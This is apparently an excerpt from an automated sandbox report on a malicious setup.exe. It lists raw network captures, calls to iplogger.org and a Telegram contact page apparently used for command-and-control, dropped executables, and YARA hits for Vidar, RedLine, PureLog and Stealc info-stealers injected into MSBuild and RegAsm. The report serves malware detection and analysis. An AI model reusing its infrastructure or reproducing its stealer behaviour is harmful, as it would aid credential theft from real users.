2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 02 06 13 02 06 37 67 e7 32 10 65 06 30 80 20 06 0e 67 27 3d 10 65 06 0d 80 0f 06 08 37 d4 4d 85 57 06 3a 67 b7 3d 10 65 06 0f 80 25 06 09 80 33 06 1e 37 15 26 8d 54 06 06 67 13 3c 10 65 06 02 67 7f 3c 10 65 06 03 67 db 3c 10 65 06 3c 67 13 3f 10 65 06 0b 67 2b 3f 10 65 06 33 03 06 18 37 9d f8 d1 57 06 55 03 06 80 37 dd 5a cc 54 06 1c 37 1d ca fd 54 06 1d 37 67 52 76 57 06 32 80 5d 06 0a 03 06 3f 80 3e 06 36 67 6f 3f 10 65 18 02 06 39 02 06 1f 37 a4 fa 8b 57 06 12 80 59 06 3b 03 06 11 80 09 19 02 06 0c 80 25 06 3d 02 06 04 02 06 34 02 06 31 03 06 19 37 22 c6 91 57 06 07 37 1e fb d3 57 06 1b 02 06 1a 03 06 24 03 06 3e 02 1e 67 df 3f 10 65 06 10 0c 06 25 15 3f 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 06 25 14 15 13 14 15 15 cb 14 15 04 15 37 05 28 8b 54 06 0c Data Ascii: 7g2e0 g'=e7MW:g=e%37&Tg<eg<eg<e<g?eg+?e37WU7ZT7T7gRvW2]?>6go?e97WY;%=417"W7W$>g?e%?3=1?%7(T
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 33 17 3d 31 Data Ascii: =1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1?3=1
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: cc 6e 54 06 02 80 3a 06 1d 37 06 cc e6 54 19 67 55 40 13 65 06 04 37 1f d7 83 57 06 1a 80 4e 06 34 03 06 0a 37 88 a4 d4 54 06 37 80 0e 06 0e 02 06 11 67 7c 40 13 65 06 08 03 06 03 80 4e 06 1b 02 06 36 37 64 95 c7 54 1e 02 06 0f 02 06 32 80 80 06 80 02 06 1e 67 b0 40 13 65 06 3b 02 06 3f 03 06 19 03 06 31 67 06 43 13 65 06 3a 02 06 18 03 06 24 37 91 e8 db 54 06 33 02 06 3e 80 28 18 67 28 43 13 65 06 06 67 9c 43 13 65 06 3d 02 06 0c 03 06 55 03 06 10 67 d2 43 13 65 06 1c 03 06 30 37 c3 11 2e 57 06 3c 02 06 25 67 2e 42 13 65 06 09 80 5d 06 12 67 7e 42 13 65 06 01 15 3f 33 17 3d 31 15 15 1f 15 15 3f 15 15 06 25 14 15 e9 15 15 15 4a 16 15 04 15 37 80 03 aa 57 06 55 80 03 06 11 03 18 37 75 35 02 57 19 80 3a 06 37 67 a6 42 13 65 06 25 03 06 1a 67 e2 42 13 65 06 Data Ascii: nT:7TgU@e7WN47T7g\|@eN67dT2g@e;?1gCe:$7T3>(g(CegCe=UgCe07.W<%g.Be]g~Be?3=1?%J7WU7u5W:7gBe%gBe
2024-07-01 22:05:15 UTC	16384	IN	Data Raw: 06 3f 02 06 1d 37 ac e4 70 57 06 0d 02 06 06 02 06 3c 67 b8 2f 12 65 06 35 02 06 03 67 1c 2e 12 65 06 13 80 23 06 31 37 4a 71 b8 54 06 12 80 46 06 0e 67 54 2e 12 65 06 55 37 93 98 9b 57 06 07 02 1e 03 06 10 02 06 3e 80 02 06 80 02 1f 67 96 2e 12 65 06 37 67 cc 2e 12 65 06 1e 02 06 0c 02 06 04 67 34 29 12 65 06 0f 03 06 1a 67 9e 29 12 65 18 80 33 06 38 80 31 06 30 80 77 06 25 80 02 06 02 80 49 06 3d 67 ee 29 12 65 06 3a 80 45 06 36 37 a6 8f a2 57 06 1c 09 19 37 31 cf a7 57 06 39 04 19 3f 15 15 15 33 17 3d 31 15 15 1f 15 15 3f 15 15 06 25 14 15 10 14 15 15 8d 16 15 04 15 37 cc 49 55 57 06 55 80 07 06 11 37 58 34 8f 57 06 19 67 3a 28 12 65 06 0e 67 b4 28 12 65 06 3c 37 b5 64 dc 54 06 3a 67 16 2b 12 65 06 10 80 2f 06 27 80 09 06 0b 02 06 36 80 56 06 3b 37 65 Data Ascii: ?7pW<g/e5g.e#17JqTFgT.eU7W>g.e7g.eg4)eg)e3810w%I=g)e:E67W71W9?3=1?%7IUWU7X4Wg:(eg(e<7dT:g+e/'6V;7e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49768	172.67.132.113	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:25 UTC	196	OUT	GET /1nhuM4.js HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: iplogger.org
2024-07-01 22:05:25 UTC	1027	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:25 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close memory: 0.429840087890625 expires: Mon, 01 Jul 2024 22:05:25 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 40589004137263905=2; expires=Tue, 01 Jul 2025 22:05:25 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.33; expires=Tue, 01 Jul 2025 22:05:25 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=33LA21TskrqhIxK%2FTs8nS8YZ0RCrn1coZXodwmJM5sSSMv3k7tW78LsIcF%2B4oS4Eb3a%2FRis%2B1EBVHsBUNnm6Wrf64bhhr5mj%2B%2FQkMVacQJI9bhb0YVIAdIYAnLRM%2FpA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c9b28a6df04237-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 22:05:25 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-07-01 22:05:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49773	149.154.167.99	443	7080	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:28 UTC	84	OUT	GET /g067n HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-07-01 22:05:29 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 01 Jul 2024 22:05:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12303 Connection: close Set-Cookie: stel_ssid=79363a35d532208a42_2609308302275271918; expires=Tue, 02 Jul 2024 22:05:29 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-07-01 22:05:29 UTC	12303	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 30 36 37 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g067n</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.

Target ID:	0
Start time:	18:04:55
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\1719859269.0326595_setup.exe"
Imagebase:	0x7ff665aa0000
File size:	4'569'908 bytes
MD5 hash:	00AF1A53860550F8DB3F1B250436B78A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:04:57
Start date:	01/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:04:57
Start date:	01/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:04:57
Start date:	01/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
Imagebase:	0x670000
File size:	3'828'752 bytes
MD5 hash:	2AB891D9C6B24C5462E32A0BAB3D1FEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 62%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe
Imagebase:	0x400000
File size:	5'391'535 bytes
MD5 hash:	CD591EBEF2FB36E6D0C67B0237D3B1BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
Imagebase:	0xa00000
File size:	2'520'576 bytes
MD5 hash:	B58A3998F5CE749FD2DD6B8651FDE46C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000009.00000002.2627954517.0000000001CF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 46%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe
Imagebase:	0x400000
File size:	7'619'942 bytes
MD5 hash:	CB7CC0288990AB8DD4F1200D372A6A92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe
Imagebase:	0x5a0000
File size:	2'776'576 bytes
MD5 hash:	520F92170A2CF78ED3152F83973B9B66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 62%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe
Imagebase:	0xb80000
File size:	4'959'240 bytes
MD5 hash:	06333E350E25E29677256D9BE86E4EE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2451450016.0000000004314000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2421723577.000000000338B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2451450016.000000000437B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2451450016.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2451450016.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe, Author: Joe Security
Antivirus matches:	Detection: 54%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe
Imagebase:	0x140000000
File size:	10'564'608 bytes
MD5 hash:	3B24971C5FEF776DB7DF10A769F0857A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe
Imagebase:	0x7ff675420000
File size:	8'077'824 bytes
MD5 hash:	2BC0DB539A8FAB08BF4104EB7F2DE7E7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000000E.00000002.2560583044.000000C00023A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000000E.00000002.2571364769.000000C000802000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe
Imagebase:	0x400000
File size:	7'636'477 bytes
MD5 hash:	3821B6AD2BE5C1F137F798889C75B8FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:05:17
Start date:	01/07/2024
Path:	C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe
Imagebase:	0x6a0000
File size:	957'440 bytes
MD5 hash:	75A2D212A591A83A4D0C88A92B390B88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2414041774.000000000073A000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:05:18
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf90000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2559747282.0000000003335000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2550868156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2559747282.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:05:18
Start date:	01/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	18:05:19
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 424 -ip 424
Imagebase:	0x460000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:05:20
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 284
Imagebase:	0x460000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:05:20
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x8b0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000015.00000002.2806277052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:05:21
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe
Imagebase:	0x400000
File size:	6'678'978 bytes
MD5 hash:	5FA0CB47D0F8879A4ABD65363062A198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:05:21
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp" /SL5="$70066,5141152,54272,C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe"
Imagebase:	0x400000
File size:	696'832 bytes
MD5 hash:	6F995E2D6C8D0D1D03CB3AFCD1DEAFAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.3364376195.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	18:05:22
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe
Imagebase:	0x400000
File size:	6'693'091 bytes
MD5 hash:	B3120D636B76D400397F33F9475EBBDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:05:22
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x330000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:05:22
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe /bfYudidAVdU "385137" /S
Imagebase:	0xc70000
File size:	6'980'608 bytes
MD5 hash:	71BF676AE80AFA9F2577D2EAE6A133AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:05:23
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xba0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.2396195188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:05:23
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:05:24
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe /iwYBYdidlHmT "525403" /S
Imagebase:	0xaf0000
File size:	6'998'528 bytes
MD5 hash:	84DA5FC2F43E551848349F0D0D3FACA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 50%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:05:25
Start date:	01/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	18:05:25
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe" -i
Imagebase:	0x400000
File size:	3'942'200 bytes
MD5 hash:	0918C3DC6A1E6CCE306FA4FF996E66BB
Has elevated privileges:	true
Has administrator privileges:	true
